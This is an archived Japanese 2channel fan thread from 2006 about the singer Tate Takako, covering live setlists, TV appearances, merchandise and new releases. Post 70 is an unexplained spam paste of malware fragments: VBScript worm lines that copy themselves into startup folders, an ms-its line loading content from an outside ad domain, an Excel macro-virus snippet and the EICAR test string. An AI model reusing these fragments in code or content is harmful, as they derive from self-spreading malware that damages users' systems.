2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

タテタカコ その2

1 :名無しの歌姫:2006/05/21(日) 23:06:54 ID:ryp+1kEc
前スレ
【誰も】 タテタカコ 【知らない】
http://music4.2ch.net/test/read.cgi/minor/1090727216/l50

公式 http://www.tatetakako.net/

スレタイはシンプルに。

2 :名無しの歌姫:2006/05/21(日) 23:09:39 ID:6+BFKJWH
ヨコタカコ

3 :名無しの歌姫:2006/05/21(日) 23:21:11 ID:T5jwKr45
>>1
乙!

4 :名無しの歌姫:2006/05/21(日) 23:26:43 ID:9vlvQJ9h
>好きなもの 梨、マンゴー、西瓜、レッドグローブっていう安い葡萄、ワセリン

>ワセリン
( ゚д゚)…


5 :名無しの歌姫:2006/05/21(日) 23:42:53 ID:9Ga/lvLd
>>1
乙ですだに

6 : ◆ZE8bKuxgL2 :2006/05/22(月) 07:18:21 ID:HOKQzZok

祝・新スレ、祝・インディーズ板脱出!

ttp://ja.wikipedia.org/wiki/%E3%82%BF%E3%83%86%E3%82%BF%E3%82%AB%E3%82%B3
ついでなんでwikipediaも載せます。

# 俺が立てたかったスレをやられた、しかも昨日2つも…(´Д⊂

7 :名無しの歌姫:2006/05/23(火) 04:55:24 ID:mR3QHfiE
1 乙 タテさん主演の映画が見たい。テーマは彼女の生涯と作曲時の苦悩、共に歩んで行く男性との出会いについて。

8 :名無しの歌姫:2006/05/24(水) 00:24:41 ID:4mWDgjUG
>>7
内容的には映画向きじゃないだろ。
せいぜいビデオだな。

ところでタテタカコって「誰も知らない」での演技、イケてると思うね。
ちょっと内向的なところがある人を演じさせたら一流だと思う。
ちょっと不思議なキャラクターが逆にリアル。
特別に美人というわけではないが、飾らない美しさがある。

9 :名無しの歌姫:2006/05/24(水) 01:28:22 ID:ReQ+8tJ3
映画つうよりドキュメンタリーのがおもしろそう
また是枝監督に撮ってもらえばいいに

10 :名無しの歌姫:2006/05/24(水) 21:08:48 ID:4mWDgjUG
是枝監督ってエレカシのドキュメント撮ってたよな。
エレカシくらいメジャーじゃないとキツイだろね。

11 :名無しの歌姫:2006/05/25(木) 19:16:30 ID:sPwUgQ36
ミッシェルガンエレファントタカコに改名

12 :名無しの歌姫:2006/05/25(木) 19:34:54 ID:9CgpoGg+
>>11
激しく断る

13 :名無しの歌姫:2006/05/27(土) 21:22:15 ID:uAZoPJjT
>>8
彼女、映画のシーンによってはすごく綺麗にみえるけどなぁ。

14 :名無しの歌姫:2006/05/28(日) 18:53:34 ID:kmB5UUu3
昨日スカジャン着てたなー

15 :名無しの歌姫:2006/05/30(火) 02:06:14 ID:KpSFtFv2
そろそろNHKのあれ、出てもいいんじゃ・・・

16 :名無しの歌姫:2006/05/30(火) 09:00:36 ID:fGRmqmq6
>>15
スタパーのこと?

17 :名無しの歌姫:2006/05/31(水) 14:49:50 ID:p1LCkzxb
>>16
ライブビートじゃね?

18 :名無しの歌姫:2006/06/01(木) 14:05:47 ID:qwPHMkhx
>>16
たぶんそれ。もう一回収録してもいいと思うがなぁ。

ータテタカコ詩集ー「稜線の彼方へ」プレゼントのお知らせ
30名かぁ・・・あたらなそうだなorz

19 :名無しの歌姫:2006/06/06(火) 12:06:06 ID:4/gkDzf0
飯田に引っ越した

20 : ◆ZE8bKuxgL2 :2006/06/06(火) 18:30:05 ID:oDdbBg4m
>>19じゃ、これ。
【語らいの場】長野県飯田市【第31集会所】
http://kousinetu.machi.to/bbs/read.pl?BBS=kousinetu&KEY=1149431834

21 :名無しの歌姫:2006/06/08(木) 01:50:39 ID:KFn3lyJK
>>18
それって生の予定が特番だかなんだかで飛んじゃったんだっけ?
是非スタジオパーク出てもらいたいね。


22 :名無しの歌姫:2006/06/08(木) 13:38:47 ID:itHF9R8Y
>>21
国会中継で中止になったんだよな。

スタパよりトップランナーで見たい。(まぁ無さそうだけど…)
それかライブビート。

23 :名無しの歌姫:2006/06/08(木) 16:50:24 ID:k5hDKF/C
むしろ情熱大陸で。

24 :名無しの歌姫:2006/06/09(金) 10:56:10 ID:KiHi4IgD
>>22
そうそう、国会中継だった。
なんか問題起きたんだったっけか…覚えてない。

たしかにトップランナーもいいね。

しかしなんで延期じゃなくて中止なのか不思議だ。
生番組にスタジオまでアーティストを呼んどいて、
中止はないだろーっちゅーことで、
事務所サイドがへそまげちゃったとかなのかな。

25 :名無しの歌姫:2006/06/09(金) 15:57:36 ID:fPVDVWgv
残念ながら彼女のようなシンガーってタイミングを逃すと出演チャンスが
立ち消えに成りやすいと思うね。
次のアルバム出すとかツアーが始まるとか、なんかキッカケがないとね。
映画出るとか。NHKのレギュラー取るとか。


26 :名無しの歌姫:2006/06/09(金) 16:53:16 ID:tjB/tVqA
>映画出るとか
『誰も知らない』!『誰も知らない』!

しかしNHKのレギュラーは無理じゃないか?スペシャかM-ONならわかるけど。

27 :名無しの歌姫:2006/06/09(金) 21:06:21 ID:fPVDVWgv
『誰も知らない』は一瞬すごい話題になったけど、意外と知られてないんじゃない?
いや、正確にいえば忘れられるのが早かったというべきか....。
私だって映画見なかったら絶対タテタカコの魅力を知らずにいたと思うョ。

是枝監督、新作ではタテちゃん使わなかったみたいね。
残念。

28 :名無しの歌姫:2006/06/09(金) 21:16:58 ID:fPVDVWgv
>>26
みんなのうた はどう?
だいぶ前のスレでも上がったけど。

最近はCharとかさだまさしとか幅広い人選だよ。

29 :名無しの歌姫:2006/06/09(金) 21:19:39 ID:4KgY8VS1
大分前にオレが立てたスレが2に突入とは・・・

30 :名無しの歌姫:2006/06/09(金) 21:22:34 ID:fPVDVWgv
>>29
そりゃおめでとう。
長い『道のり』でしたね。
まだまだ先は長そうですね。

31 :名無しの歌姫:2006/06/09(金) 21:30:39 ID:4KgY8VS1
宛先が晒された
タテタカコ〜お知らせ〜06/02/17
のメールまだ残ってるよ。

悪いことはしないけどね。

32 : ◆ZE8bKuxgL2 :2006/06/09(金) 21:35:51 ID:Mbo1WoXt
>>29
おめでとうでし
市民の俺からもお祝いします。

33 :名無しの歌姫:2006/06/10(土) 03:02:06 ID:60CqIqAu
>>31


34 :名無しの歌姫:2006/06/10(土) 21:15:44 ID:uCmn/9HR
国会中継で中止になったけど、その後のスペシャルか何かに出たじゃん。

35 :名無しの歌姫:2006/06/10(土) 22:56:58 ID:60CqIqAu
あのときメラのヨイトマケで泣いてたね

36 :名無しの歌姫:2006/06/11(日) 14:38:42 ID:2RO233PM
>>34
そういやそんな話もあったね
それってスタパのスペシャル?
その時のスタジオライヴでのセトリ希望

>>31
それ何?

保守

37 :名無しの歌姫:2006/06/11(日) 14:57:11 ID:T+11Zh+p
>>36

公式にあるこれ↓
>タテタカコのお知らせを不定期でお送りしています。
>ご希望の方はinfo@tatetakako.netまで「氏名」「住所」そして「お知らせ希望」と明記の上
>お送りください。

いつもは多分BCCで送ってたと思うが、
2/17はミスしてCCで送っちゃった。
多分500件以上あると思うよ。

38 :名無しの歌姫:2006/06/11(日) 18:06:19 ID:KQ/EMhKo
>>37
どうして住所氏名まで書く必要が?

39 :名無しの歌姫:2006/06/11(日) 20:50:46 ID:2RO233PM
>>37
そうなんだ。
漏れは3月4日分からのしか知らないわ。

40 :名無しの歌姫:2006/06/12(月) 00:03:07 ID:ujW7jX4M
気狂いピアノ終了age

41 :名無しの歌姫:2006/06/12(月) 00:15:10 ID:F3Q5ixad
ライブよかった。
ところで1曲目の曲、はじめて聴いたんだけどなんて曲?



42 :名無しの歌姫:2006/06/12(月) 00:28:13 ID:6C7FPHn4
>>41
行ってないけど頬杖と見た!

43 :名無しの歌姫:2006/06/12(月) 00:34:37 ID:6C7FPHn4
ん違うっぽいな

44 :41:2006/06/12(月) 00:39:55 ID:F3Q5ixad
>>42
頬杖は何度か聴いたことあるんで知ってます。
ちなみに真ん中位でやりましたw

新曲なのかな?


45 :名無しの歌姫:2006/06/12(月) 01:34:35 ID:6C7FPHn4
>>44
やっぱ頬杖じゃないんだw

噂の「道のり」かもね

46 :名無しの歌姫:2006/06/12(月) 02:16:53 ID:6AX0PRIE
タテさんはCD3枚しか出して無いのにさらにまだ発表してない曲があるから困る。
次のアルバムに入るかな?

47 :名無しの歌姫:2006/06/12(月) 09:07:50 ID:PrZTufjw
昨日のセトリいきます。

1.新曲
2.心細い時にうたう歌
3.烙印
4.渦
5.宝石
6.頬杖
7.傷

なんか高音のトーンが硬くなった様な気がするなぁ...。
とはいえ、新曲とても良かった。かなり展開がある曲。

48 :名無しの歌姫:2006/06/12(月) 12:21:15 ID:Wt/8HSRM
コアなタテファンに質問
タテさんって持ち曲何曲あるんですか?

もう一点質問
他のアーの楽曲をカヴァーすることはあるんですか?

49 :名無しの歌姫:2006/06/14(水) 00:52:40 ID:BT3bk9Hk
保守

50 :名無しの歌姫:2006/06/15(木) 01:04:26 ID:URlkxfh7
何気に夏にレコーディングって書いてあるね


51 :名無しの歌姫:2006/06/19(月) 00:17:28 ID:1ltqoG2x
新曲いつごろ出るかな?秋?冬?わくわく
てかタテさん飯田久しぶりなのか。

52 :名無しの歌姫:2006/06/19(月) 00:21:49 ID:C8CLiSiG
ほしゅ

53 :名無しの歌姫:2006/06/19(月) 19:18:24 ID:H+mlWeNs
タテさんの曲ってピアノ以外の楽器使ってる曲ある?

54 :名無しの歌姫:2006/06/19(月) 20:59:20 ID:ImJXVvLI
宝石の間奏でリコーダー


55 :名無しの歌姫:2006/06/19(月) 22:43:39 ID:3ogflzZX
おもちゃのピアノ@女の子

56 :名無しの歌姫:2006/06/19(月) 23:37:12 ID:nwBPaZ+v
>>54
タテタカコを知ったのは、「宝石」が切っ掛けだったんだけど、
初めて聴いたときは、栗コーダーとコラボしてるのかと思ったw。

57 :名無しの歌姫:2006/06/20(火) 00:45:18 ID:eN5yykih
>>48
21+頬杖+新曲でOKかな?
他のアーティストのカバーは聞いたことが無い。スマソ。

58 :名無しの歌姫:2006/06/20(火) 02:39:45 ID:5hRudoC3
>>57
つ 月

59 :名無しの歌姫:2006/06/23(金) 01:55:15 ID:iDGaGaRF
あああああああ!
詩集プレゼント忘れてたあああああああ!チクショー!

60 :名無しの歌姫:2006/06/25(日) 12:22:48 ID:7Mm6vro0
タテさんは何カップ?

61 :名無しの歌姫:2006/06/25(日) 15:23:04 ID:FZ9JJaHq
日清エースカップ

62 :名無しの歌姫:2006/06/26(月) 00:15:55 ID:Af3vAOyZ
「誰も知らない」買って半年位放置してたのをやっと観たよ。
重いね。秋田の事件を感じさせる所もありーので観ていて打たれるようやった。

タテさん本人は今日知りました*爆*。役柄もそうやけど、歌も含めワシの好みやね。
大平峠の茶店で一緒に団子食いたいと思うた。

63 :名無しの歌姫:2006/06/26(月) 16:57:48 ID:rXERhufJ
ところでさぁ、矢野絢子氏との同盟話しって、
一体どういう話しなんだろうか

64 :名無しの歌姫:2006/06/26(月) 21:43:46 ID:+q2giur3
誰も知らないって昔あった巣鴨子供置き去り事件だよね。あの主題歌きっかけでファン!かなりいいよね!

65 :名無しの歌姫:2006/06/30(金) 00:40:24 ID:duzItjXX
保守

66 :名無しの歌姫:2006/07/01(土) 12:20:16 ID:uVoVhPAv
つーかタテさん第一人称わしなんだな

67 :名無しの歌姫:2006/07/01(土) 17:13:09 ID:TYr9EVsb
「ぱやぱや」はどのような状態をさす言葉なんだろう

68 :名無しの歌姫:2006/07/02(日) 01:48:31 ID:AuQq2PTt
フジファブリックの歌詞であったな。ぱやぱや。
パジャマでパヤパヤとかいって。変態だ。
だがそれがいい。

69 :名無しの歌姫:2006/07/02(日) 14:22:22 ID:bzmT1CtS
胸小さくね?

70 :名無しの歌姫:2006/07/02(日) 14:48:21 ID:WmcDUPUv
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

71 :名無しの歌姫:2006/07/02(日) 22:40:32 ID:NgCNNuf2
ウイルスうざい....。

72 :名無しの歌姫:2006/07/03(月) 02:13:23 ID:ID1yGZG+
ナタデココに改名

73 :名無しの歌姫:2006/07/03(月) 18:46:45 ID:eJKJAFCT
>>69
まあ、垂れないからいいじゃない?

74 :名無しの歌姫:2006/07/06(木) 17:38:06 ID:gI6LJaWd
あげ

75 :名無しの歌姫:2006/07/06(木) 21:37:15 ID:+Eo3yV4/
ぎょうざ

76 :名無しの歌姫:2006/07/07(金) 00:27:06 ID:7pCDvC94
うまし

77 :名無しの歌姫:2006/07/09(日) 00:47:43 ID:d0KxOqaH
だに

78 :名無しの歌姫:2006/07/09(日) 09:58:14 ID:FwGZjmd6
処女?

79 :名無しの歌姫:2006/07/10(月) 06:26:04 ID:rOAqSNL+
うーけてたとー
うーけてたとー

80 :名無しの歌姫:2006/07/10(月) 09:45:02 ID:xqd6ipX8
この人はビブラードが魅力的だな。あの人のビブラードとか好きだ。
綾線の彼方へはビブラードが少ないからか3作のなかではあまり聞かないかも…
でも春風大好きだよ春風。

81 :名無しの歌姫:2006/07/12(水) 15:17:47 ID:FKLAP1Tw
タテタカコって自分が知ってる数々のアーティストの中でも、
一番ビブラートをかけない歌い手だと思ってたんだけど...。
「あの人」も、別に全然ビブラートかけてなくない?
ていうか、「ビブラート」と「ビブラード」って別モノ??




82 :名無しの歌姫:2006/07/14(金) 02:26:07 ID:a5c6f+l+
age

83 :名無しの歌姫:2006/07/14(金) 15:29:50 ID:W/Qfh7GT
GYOUZA

84 :名無しの歌姫:2006/07/16(日) 23:11:36 ID:8U1dgrIs
age

85 :名無しの歌姫:2006/07/17(月) 00:50:43 ID:UtjrCmcx
gyouza

86 :名無しの歌姫:2006/07/18(火) 04:12:23 ID:TGxtIlDU
早く新曲出さないかなー。

87 :名無しの歌姫:2006/07/18(火) 12:59:55 ID:YOr57Q3m
今夏レコーディング始めるみたいだから、来年初めくらいかな

つか三部作の次ってフルアルバムなのか?

88 :名無しの歌姫:2006/07/23(日) 00:14:04 ID:9q+9VDsY
ん、もうすぐ誕生日だね

89 :名無しの歌姫:2006/07/24(月) 00:06:07 ID:J4iJT3NO
市民から誕生日おめ

90 :名無しの歌姫:2006/07/24(月) 00:15:19 ID:oNmWHrMQ
中信から(・∀・)オメっ

91 :名無しの歌姫:2006/07/24(月) 03:42:00 ID:12P1ySiw
愛知からおめでとう。
アルバム頑張れ

92 :名無しの歌姫:2006/07/25(火) 10:38:23 ID:4c44136j
東京からオメデトウ(・∀・)ノシ
三部作の次作は是非フルアルバムをお願い

93 :名無しの歌姫:2006/07/27(木) 23:45:23 ID:JOtvoD1s
TAJIMIまであと一ヶ月じゃー。
まだチケットとっとらん。明日ぴあでとります

94 :名無しの歌姫:2006/07/30(日) 13:25:23 ID:n9cUlPMv
この人のライブってグッズ販売とか無さそうだけど、あるの?

95 :名無しの歌姫:2006/07/30(日) 14:57:08 ID:E+vlOIXl
Tシャツと足袋

96 :名無しの歌姫:2006/07/30(日) 19:51:30 ID:n9cUlPMv
た…足袋!?

97 :名無しの歌姫:2006/07/30(日) 20:19:52 ID:E+vlOIXl
まじだよ。タテタカコと名前入り。

さすがに男なんでTシャツだけ買った。

98 :名無しの歌姫:2006/07/31(月) 18:02:05 ID:OVR/cB/q
扁平足ってライブ会場で売っとるかね?まだ手に入れて無い…

99 :名無しの歌姫:2006/08/03(木) 21:01:00 ID:lUXj8VYx
しかし過疎りすぎだろ。インディーズ板のほうがたくさんいたんじゃないか?

100 :名無しの歌姫:2006/08/03(木) 23:35:45 ID:t8LyIKbz
ヨエッコさんとの曲はどうなんだい

101 :名無しの歌姫:2006/08/07(月) 12:04:17 ID:D0M2jiTi
>扁平足ってライブ会場で売っとるかね?

売ってますよ。

102 :名無しの歌姫:2006/08/10(木) 00:07:24 ID:lnNdazs0
多治見だっけ?行く人いるー?

103 :名無しの歌姫:2006/08/13(日) 03:56:07 ID:LW0zdfTF
人いなさすぎ。
そろそろライブの話題とかで盛り上がるだろうに

104 :名無しの歌姫:2006/08/13(日) 11:25:40 ID:nKpZdBv3
やっぱまだインディー(ズ)なのかねぇ…

105 :名無しの歌姫:2006/08/14(月) 22:17:33 ID:ZLQWM2Rj
ひさしぶりに来てみたら相変わらずだに

106 :名無しの歌姫:2006/08/21(月) 02:11:43 ID:SkRd2TiS
age


107 :名無しの歌姫:2006/08/22(火) 15:40:22 ID:eM/yC7F8
>>100
想像したより凄い噛み合っててめっさ良かった。
ライブで二人の連弾聞いてみたいとオモタ

108 :名無しの歌姫:2006/08/25(金) 08:08:21 ID:rdZaqseG



109 :名無しの歌姫:2006/08/25(金) 13:21:25 ID:qQbBhDh8
>>107
さんくす。ライブでいっしょにやってほしいな。
今度借りてみよー。

110 :名無しの歌姫:2006/08/26(土) 20:00:54 ID:2s/4AIzL
このなかで明日多治見行くのは自分だけ?

111 :名無しの歌姫:2006/08/27(日) 16:16:05 ID:5ICJhPlQ
きのう月やったよ。

112 :名無しの歌姫:2006/08/27(日) 21:21:13 ID:1SUeHUS+
じゃ今日やったのも月かな。
それと未発表でやったのは頬杖と道のり?
来月から沖縄にてレコーディングだそうです。

113 :名無しの歌姫:2006/08/27(日) 21:54:33 ID:5ICJhPlQ
>>112
沖縄でレコーディングかー。

ちなみに昨日のライブでは道のりで始まり、月はラストだったよ

新作には道のり、頬杖、月が入るのかね。

114 :名無しの歌姫:2006/08/28(月) 00:16:11 ID:M6PY/5li
今日やった曲(曲順忘れた…スマソ)
夕立
宝石
太陽
あの人
心細い時にうたう歌
烙印

卑怯者
えのぐ
春風
フルサト
しあわせのうた

頬杖
道のり


アンコールでやったのが春風としあわせのうた。
マイクに頭ぶつけてマイクに謝るタテさん。
「なんだか招いてもらいながら『ようこそ』っていうのはねぇ…(笑)」
「このライブの主役はわしではなくこのピアノ(名前忘れた)なんで…」
「大切な日曜日に来て頂いて本当に申し訳ない」
こんなこと話したと思う。MC結構面白かった。
来月沖縄でレコーディングらしい。
扁平足うってなかった…。通販で買うことにした。
なんか地元のオバハン、じいちゃん、家族連れが結構いた。
でもその人たちはCDも買って行ってた。
サイン会やっててタテさんのサインゲット&握手してもらった。

115 :名無しの歌姫:2006/08/28(月) 12:25:54 ID:Xy1xRIbi
>>114
レポ乙
しあわせのうた羨ましい。何回かライブ行ってるけど一回しか聴いたことない…。


ヨエッコさんの御中元聴いたんだけど、タテさんとの曲いいね。
ヨエコとタカコ名義でミニアルバム作って!

116 :名無しの歌姫:2006/08/30(水) 11:21:26 ID:/J5Xz/R8
Mステて頬杖を歌うタテさんを妄想

117 :名無しの歌姫:2006/09/05(火) 19:04:29 ID:ffRfDswu
 

118 :名無しの歌姫:2006/09/06(水) 12:23:07 ID:oXhi2Qrj



119 :名無しの歌姫:2006/09/10(日) 03:38:27 ID:SRZTu3IX
(T_T)

120 :名無しの歌姫:2006/09/10(日) 23:30:09 ID:SRZTu3IX
(´・ω・`)

121 :名無しの歌姫:2006/09/13(水) 22:50:51 ID:wRQatC1P



122 :名無しの歌姫:2006/09/13(水) 22:53:07 ID:wRQatC1P



123 :名無しの歌姫:2006/09/22(金) 17:36:43 ID:391paAIj



124 :名無しの歌姫:2006/09/22(金) 20:48:15 ID:GiX/rDOd
どうしたおまえら、しっかりしろw

125 :名無しの歌姫:2006/09/22(金) 22:00:59 ID:Uzxsg3px
ベンジーに何故かわらた

126 :名無しの歌姫:2006/09/22(金) 22:52:50 ID:3D03Rxet
ちきしょー!常滑いけねー!

127 :名無しの歌姫:2006/09/26(火) 22:18:50 ID:tKPjakGr
そしてまた過疎に

128 :名無しの歌姫:2006/10/02(月) 21:55:44 ID:vOFqSja4
そしてスプリットアルバム発売決定

129 :名無しの歌姫:2006/10/03(火) 03:16:56 ID:U1aseQmi
うおお!新曲!?

130 :名無しの歌姫:2006/10/03(火) 21:49:51 ID:IspgtOMG
11月22日リリース。沖縄で録音された曲から、今までに増して鮮烈かつポップな3曲が、
この夏、八ヶ岳で録音されたビーグルズの新曲3曲と併せて収録されます。タテタカコ
の底知れぬアイディアの懐を伺わせる斬新さを持った、楽しくて獰猛で強烈な3曲です。

何入るんだろーね

131 :名無しの歌姫:2006/10/04(水) 09:01:26 ID:bhu0d0M4
>楽しくて獰猛で強烈な3曲

ワロタwww

132 :名無しの歌姫:2006/10/04(水) 14:20:24 ID:YmoBiLHp
収録曲出てるね

手の鳴る方へ

押し問答

だって。頬杖は次のアルバムか…

133 :名無しの歌姫:2006/10/15(日) 00:13:18 ID:z9roJhjP
なぜこのスレは新曲発表されたのにこんなに過疎なのだろう。

134 :名無しの歌姫:2006/10/15(日) 00:24:27 ID:guQicsPM
歌い手も聞き手も静かな人が多い。

135 :名無しの歌姫:2006/10/15(日) 21:22:42 ID:BN4RIRTH
テラワロスw


とかあんま使わなそうだよな。

136 :名無しの歌姫:2006/10/15(日) 21:30:00 ID:1sFm00Bt
ここ3人位で廻してんだろ

137 :名無しの歌姫:2006/10/15(日) 22:07:32 ID:BN4RIRTH
ノシ

138 :名無しの歌姫:2006/10/16(月) 23:57:12 ID:EtzDRMPg
二人目(3人目か?)
ちょっと前もこんなのやってた気がするな。

139 :名無しの歌姫:2006/10/17(火) 01:09:15 ID:2I0c34E8
前に点呼とったときは結構いたよなー

140 :ボンシャンス・ヴィラージュ ◆swfW19A8Wo :2006/10/18(水) 08:15:13 ID:N5xyqYHk
では、点呼。

1っ!!

141 :名無しの歌姫:2006/10/18(水) 08:34:15 ID:DbW2vleZ
2!
10人行くかな…?

142 :名無しの歌姫:2006/10/18(水) 12:57:57 ID:15AjaNL/
ノシ


143 :名無しの歌姫:2006/10/18(水) 13:22:53 ID:znW8fjBA
3!

144 :名無しの歌姫:2006/10/18(水) 15:14:11 ID:fucVQZTm
4様!

145 :名無しの歌姫:2006/10/18(水) 18:42:15 ID:15AjaNL/
なんでスルー…
あらためて5!

146 :ボンシャンス・ヴィラージュ ◆swfW19A8Wo :2006/10/19(木) 21:00:07 ID:A484hgq5
まだ5人かね…

147 :名無しの歌姫:2006/10/20(金) 17:31:23 ID:zb+iU0iA
(´;ω;`)ブワッ

148 :名無しの歌姫:2006/10/20(金) 23:43:04 ID:zw/DCAMD
5人でまわしていこうじゃないか!

(´・ω・`)

149 :名無しの歌姫:2006/10/22(日) 01:16:07 ID:oaokwGLa
じゃ、とりあえず6。



ていうか、このスレ定期的に点呼してるなw

150 :名無しの歌姫:2006/10/22(日) 01:18:47 ID:l4yIOWHe
常滑予約したけど
めんどくさくて行かなかった7

151 :名無しの歌姫:2006/10/22(日) 01:24:06 ID:l4yIOWHe
ちなみに俺インディーズ板に前スレ立てたけど
ぜんぜん見に行ってなかった

152 :名無しの歌姫:2006/10/22(日) 19:32:56 ID:7X9y4Fgp
あれ?そういや常滑ってもう終わった?終わったならプレイリストは?

153 :名無しの歌姫:2006/10/23(月) 02:51:53 ID:YntfA86k
(´;ω;`)ブワッ

154 :名無しの歌姫:2006/10/23(月) 09:15:35 ID:a6r00qCn
6人じゃあな…
学校さぼってでも行けば良かった…

155 :名無しの歌姫:2006/10/23(月) 12:57:55 ID:FW8z1UDJ
名古屋来いよぉぉぉチクショー…

156 :名無しの歌姫:2006/10/24(火) 02:10:04 ID:MaA98KKX
7・・・たまに見ているよ

157 :ボンシャンス・ヴィラージュ ◆swfW19A8Wo :2006/10/25(水) 18:26:15 ID:ynuu17sl
すまん、俺は市民なのだが諸事情でライヴとか行けないんだ。
他の皆さんに期待してるぜ!

ところで、地元の方でカキコしてるのって俺だけ?

158 :名無しの歌姫:2006/10/25(水) 18:41:09 ID:f6zj7jS0
何市民なのか分からん

159 :名無しの歌姫:2006/10/25(水) 22:15:26 ID:h0TCuv5B
8!

160 :名無しの歌姫:2006/10/28(土) 01:54:39 ID:EluJ3cl3
7がかぶってない?? つうと俺は10か
ライブ行きたし

161 :ボンシャンス・ヴィラージュ ◆swfW19A8Wo :2006/10/28(土) 17:37:58 ID:uvuJdchx
>>158
飯田だよ。説明不足謝罪

162 :名無しの歌姫:2006/10/28(土) 20:13:47 ID:FdbtPIth
新作ジャケットの写真はいいんだけど、ロゴが微妙だなー
アー写は好きスキー

163 :名無しの歌姫:2006/10/30(月) 17:01:04 ID:x6nuT7/c
とっとこタテタカコ

164 :名無しの歌姫:2006/11/03(金) 00:13:43 ID:1VNxd79l
>>163
だーいすきなのはー


ワセリン

165 :名無しの歌姫:2006/11/03(金) 23:21:43 ID:uCbXSPp8
おーい
映画の主題歌きたよー

166 :名無しの歌姫:2006/11/04(土) 08:11:19 ID:ZAwjxGPz
まじでか。合宿中の俺に詳しく

167 :名無しの歌姫:2006/11/04(土) 18:44:39 ID:trmzmHxk
>>166
もう見たかもしんないけど一応

映画「アルゼンチンババア」(2007年春全国ロードショー/よしもとばなな原作/長尾直樹監督)主題歌に決定
原作は2002年末にロッキンオン社から発刊。奈良美智さんのイラストが印象的な装丁で話題に。今年夏には幻冬舎から文庫本化。
主演は役所広司さん、鈴木京香さん、堀北真希さん。アンデス民謡に取材した新曲 "ワスレナグサ"が主題歌として使用されます。

168 :名無しの歌姫:2006/11/10(金) 22:01:08 ID:dOJ54hWa
アンデス民謡?

169 :名無しの歌姫:2006/11/19(日) 23:02:23 ID:ztoNQKb2
保守

170 :名無しの歌姫:2006/11/21(火) 23:34:07 ID:NQCXT9EV

(●▼●) < 発売age
(∩∩)


171 :名無しの歌姫:2006/11/22(水) 09:08:12 ID:xPiBUWCU
あれ?新曲今日発売日?

172 :名無しの歌姫:2006/11/22(水) 17:07:54 ID:vuJFlRn9
>>171
そうだよ。
本日ガケ書房にて入手。今から聴いてみる。

173 :名無しの歌姫:2006/11/22(水) 18:24:42 ID:xPiBUWCU
サンクス。なんで新曲発売日なのにこんなに人いないんだ。
俺も帰りタワレコいって買ってくる。

174 :名無しの歌姫:2006/11/22(水) 23:19:09 ID:k86BUvqB
タテさん、歌い方大分変わった?
こう言うのもなんだが、まえのがよかったかも・・・

175 :名無しの歌姫:2006/11/23(木) 00:24:49 ID:jOnenfpF
ヨエコっぽくなった?

糠漬け定食下さい

176 :名無しの歌姫:2006/11/23(木) 06:34:21 ID:cXn74Q57
おれは歌い方今回のが全然好き
ビーグルズも初めて聴いたがガツンてきた

でも売れない予感

177 :名無しの歌姫:2006/11/24(金) 04:07:03 ID:2D+5ub2N
関西ボダがしつこい
http://off3.2ch.net/test/read.cgi/offreg/1147708574/887-889

178 :名無しの歌姫:2006/11/24(金) 08:46:36 ID:UChOhmCn
誤爆ですか?怖いけど

179 :名無しの歌姫:2006/11/27(月) 10:46:47 ID:YOySMH5n
帰ってよし!

180 :名無しの歌姫:2006/11/27(月) 22:53:36 ID:8Ap3ItgV
新譜いいね タテタカコの押し問答からビーグルズの花咲く時の流れが好き

次はアルバム?シングル?
タイアップあるからシングルか?
そらの時みたいにアルバム?

181 :名無しの歌姫:2006/11/28(火) 01:07:52 ID:S9tjvSmz
アルバムでそ
月、頬杖、道のりが楽しみ
ワスレナグサはまだライブでやってないのかな?

182 :名無しの歌姫:2006/11/28(火) 19:09:26 ID:9IB00aJl
>>181
初めて聞いた、そんな曲。詳細希望。

183 :名無しの歌姫:2006/11/28(火) 21:50:23 ID:S9tjvSmz
>>182
ワスレナグサ?
だったら>>167

184 :名無しの歌姫:2006/11/28(火) 22:34:45 ID:9IB00aJl
ああ、映画の主題歌か…。あれはNativeSoilの中から使われるのかと思ってた。
完全に新曲なのか。ありがとう。

185 :名無しの歌姫:2006/12/02(土) 01:36:53 ID:QZVKapkq
JOYSOUNDのうたスキでリクエスト投票してきた。

186 :名無しの歌姫:2006/12/04(月) 01:24:53 ID:Fij+FkdQ
タテさんのカラオケは昔宝石と夕立があったのに最近行ったらなくなってた。

187 :名無しの歌姫:2006/12/04(月) 01:48:45 ID:aswKrY3p
(´;ω;`)ブワッ

カラオケで宝石とか歌ったらしんみりしちゃわないか?

188 :名無しの歌姫:2006/12/04(月) 02:20:46 ID:Fij+FkdQ
>>187
歌った。テンションが一気に下がった。
その後友達がCoccoのカウントダウンを歌うもんだから、ひどい有様だった。
でもその後なぜかいい日旅立ちで盛り上がった。謎だ。

189 :名無しの歌姫:2006/12/05(火) 20:17:16 ID:ZaTj8GxC
さっきCM見てたらタテタカコの道のりが流れたっちゃ!!!
